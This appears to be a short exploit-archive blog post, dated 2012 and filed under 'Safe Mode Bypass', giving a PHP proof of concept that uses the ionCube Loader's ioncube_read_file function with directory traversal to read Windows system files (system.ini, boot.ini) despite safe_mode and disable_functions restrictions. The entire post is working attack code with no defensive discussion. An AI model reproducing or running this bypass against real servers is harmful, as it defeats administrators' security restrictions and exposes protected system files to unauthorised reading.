- Back to Home »
- Safe Mode Bypass »
- PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass
Thursday, May 10, 2012
<!--p
if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!");
$path = str_repeat("..\", 20);
$MyBoot_readfile = readfile($path."windows\system.ini"); #just to be sure that I set correctely disable_function :)
$MyBoot_ioncube = ioncube_read_file($path."boot.ini");
echo $MyBoot_readfile;
echo "
ionCube output:
";
echo $MyBoot_ioncube;
-->